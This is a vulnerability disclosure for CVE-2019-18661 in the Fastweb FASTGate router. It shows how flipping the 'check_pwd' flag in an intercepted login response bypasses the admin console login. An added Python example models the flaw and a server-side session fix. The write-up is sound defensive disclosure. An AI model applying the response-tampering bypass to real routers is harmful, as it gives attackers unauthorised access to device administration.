CVE-2019


CVE-2019-18661

Fastweb FASTGate Router

Software version: 1.0.1b

WEB Authentication Bypass:

It is possible to bypass the login of the router's web administration console without knowing the user credentials. After an attempt to sign in with random credentials, an error message is normally returned and access to the web console is denied. That check is enforced only on the client side: modifying the "check_pwd" value from "0" to "1" in the server's response (for example with an intercepting proxy) bypasses it.

Regular Response with random credentials:

HTTP/1.1 200 OK
Server: nginx
Date: Wed, DD MM 2019 22:18:45 GMT
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
CONTENT-LANGUAGE: en
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline'
Content-Length: 96

{
  "login_confirm":{
    "login_confirm":"end",
    "check_user":"1",
    "check_pwd":"0"
  }
}

Modified Response after using random credentials:

HTTP/1.1 200 OK
Server: nginx
Date: Wed, DD MM 2019 22:18:45 GMT
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
CONTENT-LANGUAGE: en
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline'
Content-Length: 96

{
  "login_confirm":{
    "login_confirm":"end",
    "check_user":"1",
    "check_pwd":"1"
  }
}

This does not disclose the configuration directly, but the web console is fully navigable, which gives an attacker visibility of every page and feature of the administration console. The user appears genuinely authenticated, as shown by the presence of the logout button. An unauthorized user should not be able to reach or view the administrative features, and any unauthenticated request should be redirected to the default login page.
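The following is an added example, not FASTGate code, that models the bypass class described above and the server-side check that closes it. The login reply carries the same JSON shape as the router's login_confirm response; the browser-side UI decides what to render from the check_pwd flag. If the server does not also gate the administration pages on a session it issued itself, flipping check_pwd in transit is enough to walk the whole console. The hardened variant only issues a session cookie after the password verifies and redirects any request without one to the login page. The credential store, the cookie name, the page handlers and the assumption that the vulnerable server serves admin pages without any session check are all constructed for the example.

```python
"""Added example: client-side-only login flag vs. server-enforced session.
Credential store, cookie name and handlers are constructed, not FASTGate's."""
import hmac
import json
import secrets
from hashlib import sha256

# Constructed credential store (assumption); a real device would salt the hash.
USERS = {"admin": sha256(b"correct-horse").hexdigest()}


def password_ok(user: str, pwd: str) -> bool:
    stored = USERS.get(user)
    if stored is None:
        return False
    return hmac.compare_digest(stored, sha256(pwd.encode()).hexdigest())


def login_response(user: str, pwd: str) -> str:
    """Same JSON shape as the router's login_confirm reply shown above."""
    body = {"login_confirm": {
        "login_confirm": "end",
        "check_user": "1" if user in USERS else "0",
        "check_pwd": "1" if password_ok(user, pwd) else "0",
    }}
    return json.dumps(body)


def tamper_login_response(raw: str) -> str:
    """What the intercepting proxy does: rewrite check_pwd "0" -> "1"."""
    body = json.loads(raw)
    body["login_confirm"]["check_pwd"] = "1"
    return json.dumps(body)


def client_sees_console(login_reply: str) -> bool:
    """Browser-side UI logic: renders the console purely from the flag."""
    return json.loads(login_reply)["login_confirm"]["check_pwd"] == "1"


# Vulnerable server (assumed model): admin pages are served to anyone, the
# only "check" is the UI hiding them when check_pwd was "0".
def vulnerable_admin_page(request_cookies: dict) -> tuple:
    return 200, "<admin console>"


# Hardened server: a session token exists only after the password verified,
# and every admin request is gated on it.
SESSIONS = set()


def hardened_login(user: str, pwd: str) -> tuple:
    reply = login_response(user, pwd)
    cookies = {}
    if password_ok(user, pwd):
        token = secrets.token_urlsafe(32)
        SESSIONS.add(token)
        cookies["session"] = token  # cookie name is an assumption
    return reply, cookies


def hardened_admin_page(request_cookies: dict) -> tuple:
    token = request_cookies.get("session")
    if token is None or token not in SESSIONS:
        return 302, "/login"  # redirect unauthenticated requests to login
    return 200, "<admin console>"


def simulate_attack(server: str) -> tuple:
    """Random password, proxy flips check_pwd. Returns
    (UI shows console?, status of a following admin page request)."""
    if server == "vulnerable":
        reply, cookies = login_response("admin", "wrong-guess"), {}
        page = vulnerable_admin_page
    else:
        reply, cookies = hardened_login("admin", "wrong-guess")
        page = hardened_admin_page
    tampered = tamper_login_response(reply)
    status, _ = page(cookies)
    return client_sees_console(tampered), status


if __name__ == "__main__":
    print("vulnerable:", simulate_attack("vulnerable"))  # UI fooled, 200 served
    print("hardened:  ", simulate_attack("hardened"))    # UI fooled, 302 to login
```

The point the two runs make is that tampering with the response is unavoidable from the server's side, so the UI flag must never be what grants access: the decision has to be repeated, per request, against state the server created.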

The vulnerability was reported to the Fastweb team, who promptly fixed it.

Reference

link CVE